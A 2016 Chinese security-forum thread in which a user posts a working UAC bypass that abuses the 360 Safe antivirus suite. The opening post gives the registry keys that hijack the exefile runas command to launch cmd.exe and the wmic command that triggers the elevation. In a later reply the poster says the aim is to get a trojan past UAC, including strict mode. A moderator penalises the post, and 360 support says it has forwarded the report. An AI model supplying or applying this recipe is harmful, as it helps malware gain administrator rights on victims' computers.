查看: 10344|回复: 37
收起左侧

[讨论] 老子吃屎吃多又来找茬。。

 关闭 [复制链接]
kfsz123
发表于 2016-6-29 20:46:11 | 显示全部楼层 |阅读模式
老子今天下午像死鬼一样瞎逛看雪论坛上,看有人分析360绕过UAC的实现。我不懂编程,没看懂。
反正我只觉得360绕UAC不靠谱,随便就可以被别的程序利用。。别家是不是也这样?


这不,我下午一试,老方法变下照样可以。

以前那个方法是改exe关联的 runas,再运行360程序
现在老方法我试了直接弄不成功(不知道是因为系统变了还是360变了),不过再换下花样,又可以了绕过了。

还是先改exe关联的runas
[HKEY_CURRENT_USER\Software\Classes\exefile\SHELL]
@="runas"

[HKEY_CURRENT_USER\Software\Classes\exefile\SHELL\runas]

[HKEY_CURRENT_USER\Software\Classes\exefile\SHELL\runas\command]
"IsolatedCommand"="cmd.exe"

再运行360程序,只是不是直接运行,而是变成

wmic process call create commandline="C:\Program Files (x86)\360\360safe\SoftMgr\SoftupNotify.exe"

就可以了








评分

参与人数 1经验 -15 收起 理由
ikimi -15 抱歉,这个帖子按规定属于不适宜帖

查看全部评分

十送鸿钧
发表于 2016-6-29 21:16:08 | 显示全部楼层
不用谢了

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
kfsz123
 楼主| 发表于 2016-6-29 21:56:00 | 显示全部楼层

我吃的正香,别烦我。
fuzhk
发表于 2016-6-29 22:11:39 | 显示全部楼层

不是啊,虽然楼主标题是不太好,但是你应该提醒楼主主动改标题啊,不是这样啊。
一个笨鸟
发表于 2016-6-30 17:08:11 | 显示全部楼层
不明觉厉啊。哪位给解读一下?
kfsz123
 楼主| 发表于 2016-6-30 17:11:07 | 显示全部楼层
本帖最后由 kfsz123 于 2016-6-30 17:12 编辑
一个笨鸟 发表于 2016-6-30 17:08
不明觉厉啊。哪位给解读一下?


我来解释吧,就是我弄个木马怎么在装了360的机子上绕过UAC。

一般通行方法就是白名单绕UAC(百度UACME可以下到现成工具),但是碰到UAC严格模式就不行了。。

用360的好处是可以绕UAC严格模式,而且貌似win10也可以。
vm001
发表于 2016-6-30 17:29:35 | 显示全部楼层
kfsz123 发表于 2016-6-30 17:11
我来解释吧,就是我弄个木马怎么在装了360的机子上绕过UAC。

一般通行方法就是白名单绕UAC(百度UAC ...

比如在win10 64位系统下,你这一步怎么实现?

[HKEY_CURRENT_USER\Software\Classes\exefile\SHELL]
@="runas"

[HKEY_CURRENT_USER\Software\Classes\exefile\SHELL\runas]

[HKEY_CURRENT_USER\Software\Classes\exefile\SHELL\runas\command]
"IsolatedCommand"="cmd.exe"
kfsz123
 楼主| 发表于 2016-6-30 17:32:39 | 显示全部楼层
vm001 发表于 2016-6-30 17:29
比如在win10 64位系统下,你这一步怎么实现?

[HKEY_CURRENT_USER\Software\Classes\exefile\SHELL]

我没用过win10
我的win7
写那个不需要UAC的管理员权限
kfsz123
 楼主| 发表于 2016-6-30 17:49:00 | 显示全部楼层
vm001 发表于 2016-6-30 17:29
比如在win10 64位系统下,你这一步怎么实现?

[HKEY_CURRENT_USER\Software\Classes\exefile\SHELL]

我明白你的意思了。

reg import
命令
360客服
发表于 2016-7-1 10:21:15 | 显示全部楼层
您好~已经提交技术同事处理。
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-7-3 09:10 , Processed in 0.143473 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表